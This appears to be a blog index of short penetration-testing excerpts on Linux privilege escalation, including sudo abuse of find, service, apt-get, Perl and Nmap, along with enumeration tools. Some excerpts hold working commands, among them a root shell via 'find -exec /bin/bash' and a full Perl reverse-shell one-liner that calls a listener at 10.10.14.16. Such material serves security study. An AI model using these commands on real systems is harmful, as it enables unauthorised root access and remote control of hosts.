wget - Privilege Escalation

wget is a free utility for non-interactive download of files from the Web. It supports HTTP, HTTPS, and FTP protocols, as well as retrieval through HTTP proxies. If a user gets access to run it with root privileges, it can be harmful.…

laravel - schedule task – crontab

Laravel is a web application framework with expressive, elegant syntax. https://www.easylaravelbook.com/blog/introducing-the-laravel-5-command-scheduler/ https://laravel.com/docs/5.8/scheduling#scheduling-artisan-commands The Laravel command scheduler allows you to manage your task execution dates and times using easily understandable PHP syntax. You'll manage the task execution definitions in app/Console/Kernel.php Scheduling…

Using crontab and command injection privilege escalation

Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application. https://owasp.org/www-community/attacks/Command_Injection The cron daemon is a long-running process that executes commands at specific dates and times. For…

Local file upload - Magic byte change file type

Magic numbers are the first bits of a file which uniquely identify the type of file. It can be helpful to look for file format signatures and infer how the application is using them based on these signatures, as well…

find - privilege escalation

The find Linux command can help us escape from a restricted shell if you get to run the program with higher privileges, such as through a NOPASSWD entry in /etc/sudoers. How to 1. sudo -l 2. find . -exec /bin/bash \;

service - Privilege Escalation

Sudo (NOPASSWD) service - Privilege Escalation If you ever get to run the “service” command with root privileges, you can escape from a restricted shell to root. In this example /etc/sudoers has allowed a user to run this program as root without…

apt-get - Privilege escalation

apt-get - Privilege escalation apt-get can be used to escalate privileges when sudo is allowed without password. How to 1. check the permissions this user has sudo -l We can see that /usr/bin/apt-get is allowed (NOPASSWD) 2. get into changelog…

linux-exploit-suggester - Enumeration Linux kernel/Linux-based machine

LES tool is designed to assist in detecting security deficiencies for given Linux kernel/Linux-based machine. https://github.com/mzet-/linux-exploit-suggester Execute Download the tool git clone https://github.com/mzet-/linux-exploit-suggester.git cd ls Start python web server python -m SimpleHTTPServer 9999 Download the script into the server wget…

LinEnum - Linux config enumeration

The art of privilege escalation is a skill that any competent hacker should possess. It's an entire field unto itself, and while it's good to know how to perform the techniques involved manually, it's often more efficient to have a…

Linux config enumeration - linuxprivchecker

This script is intended to be executed locally on a Linux box to enumerate basic system info and search for common privilege escalation vectors such as world writable files, misconfigurations, clear-text passwords and applicable exploits. https://github.com/sleventyeleven/linuxprivchecker Execution Download the script…

Linux config enumeration - unix-privesc-check

Unix-privesc-checker is a script that runs on Unix systems (tested on Solaris 9, HPUX 11, Various Linuxes, FreeBSD 6.2). It tries to find misconfigurations that could allow local unprivileged users to escalate privileges to other users or to access local…

Perl - privilege escalation

Using Perl to elevate privileges using a reverse shell. Exploit Check sudo permissions sudo -l Start a listener on Kali/Parrot nc -lvnp 4445 run perl using sudo as no password is required. sudo /usr/bin/perl -e 'use Socket;$i="10.10.14.16";$p=4445;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' Check on…

Nmap - privilege escalation

Nmap is a scanner for network and OS services detection. However, if it is misconfigured to be used with “sudo” or “administrator” privileges, it can lead to privilege escalation. Exploit Check what sudo permission the current user has, desired “NOPASSWD” sudo -l…